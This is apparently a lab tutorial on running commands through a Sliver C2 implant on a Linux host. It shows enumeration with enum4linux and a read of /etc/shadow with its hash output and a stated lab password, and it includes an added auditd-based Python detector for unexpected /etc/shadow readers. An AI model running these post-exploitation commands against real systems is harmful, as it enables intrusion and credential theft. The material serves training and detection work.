
Using the Execute Command

Start up the Linux session with the implant created earlier. Once the session contacts the server, be sure to use the session.

While Sliver has many built-in commands, it also includes an execute command, which runs a program on the target host.

sliver > help execute

Execute a program on the remote system

Usage:
======
execute [flags] command [arguments...]

Args:
=====
command    string         command to execute
arguments  string list    arguments to the command

Flags:
======
-h, --help                    display help
-S, --ignore-stderr           don't print STDERR output
-X, --loot                    save output as loot
-n, --name          string    name to assign loot (optional)
-o, --output                  capture command output
-P, --ppid          uint      parent process id (optional, Windows only) (default: 0)
-s, --save                    save output to a file
-E, --stderr        string    remote path to redirect STDERR to
-O, --stdout        string    remote path to redirect STDOUT to
-t, --timeout       int       command timeout in seconds (default: 60)
-T, --token                   execute command with current token (windows only)

sliver >

Use the execute command to perform enumeration of the Linux target.

sliver (linsession) > execute -o enum4linux -o localhost

[*] Output:
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Oct 6 11:59:59 2024

=========================================( Target Information )=========================================

Target ........... localhost
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


=============================( Enumerating Workgroup/Domain on localhost )=============================


[E] Can't find workgroup/domain


=====================================( Session Check on localhost )=====================================


[E] Server doesn't allow session using username '', password ''. Aborting remainder of tests.

[*] Stderr:
nmblookup: /usr/local/lib/libjansson.so.4: no version information available (required by /usr/lib/x86_64-linux-gnu/samba/libcommon-auth-private-samba.so.0)
[!] Exited with status 1!

sliver (linsession) >

A similar example views the /etc/shadow file on the Linux target:

sliver (linsession) > execute -o cat /etc/shadow

[*] Output:
root:$y$j9T$zVVH4QMdrFXeZ.Kh8QZuv.$Csu0eotA0OrnarMR2bSHWuQfxytEG5yrx2G/uErgv18:20002:0:99999:7:::
daemon:*:19529:0:99999:7:::
bin:*:19529:0:99999:7:::
sys:*:19529:0:99999:7:::

📌 NOTE
No need to crack that hash. The password is P@ssw0rd
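From the defender's side, a program started with execute is an ordinary child process on the target, so a read of /etc/shadow like the one above is visible to auditd. The following is an added example, not part of the original page or of Sliver: it assumes an audit watch rule on /etc/shadow with the key shadow_read and a hypothetical allowlist of expected readers, and it runs over constructed log lines.

```python
import re

# Assumed audit rule (not from the page): -w /etc/shadow -p r -k shadow_read
KEY = "shadow_read"
# Assumption: binaries expected to read /etc/shadow on this host; tune per system.
EXPECTED_READERS = {"/usr/sbin/sshd", "/usr/bin/sudo", "/usr/bin/su",
                    "/usr/bin/passwd", "/usr/sbin/unix_chkpwd"}

# Constructed, trimmed auditd records (real records carry more fields).
SAMPLE_LOG = """\
type=SYSCALL msg=audit(1728216060.101:881): syscall=257 success=yes exit=3 ppid=2210 pid=2304 auid=1000 uid=0 comm="cat" exe="/usr/bin/cat" key="shadow_read"
type=PATH msg=audit(1728216060.101:881): item=0 name="/etc/shadow" nametype=NORMAL
type=SYSCALL msg=audit(1728216071.440:902): syscall=257 success=yes exit=4 ppid=1 pid=812 auid=4294967295 uid=0 comm="sshd" exe="/usr/sbin/sshd" key="shadow_read"
type=PATH msg=audit(1728216071.440:902): item=0 name="/etc/shadow" nametype=NORMAL
this line is not an audit record
"""

EVENT_ID = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse(line):
    """Return (event_id, fields) for one audit record, or None if malformed."""
    m = EVENT_ID.search(line)
    if not m:
        return None
    return m.group(1), {k: v.strip('"') for k, v in FIELD.findall(line)}

def unexpected_shadow_reads(log_text):
    """Flag /etc/shadow accesses by binaries outside the allowlist."""
    syscalls, paths = {}, {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue  # skip malformed or unrelated lines
        eid, f = rec
        if f.get("type") == "SYSCALL" and f.get("key") == KEY:
            syscalls[eid] = f
        elif f.get("type") == "PATH":
            paths.setdefault(eid, set()).add(f.get("name"))
    wanted = ("exe", "comm", "pid", "ppid", "uid", "auid", "success")
    return [{k: f.get(k) for k in wanted}
            for eid, f in syscalls.items()
            if "/etc/shadow" in paths.get(eid, ())
            and f.get("exe") not in EXPECTED_READERS]

if __name__ == "__main__":
    for alert in unexpected_shadow_reads(SAMPLE_LOG):
        print("ALERT unexpected /etc/shadow reader:", alert)
```

The ppid field in each alert points at the process that launched the reader, which is the next thing to examine during triage.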

One thing to keep in mind when using the execute command is that it has a default 60-second timeout. If the command you are executing takes longer than that, you need to specify a longer timeout with the -t <int> flag.

-t, --timeout       int       command timeout in seconds (default: 60)

In this example, I set the timeout to 120 seconds:

sliver (linsession) > execute -o -t 120 enum4linux -a localhost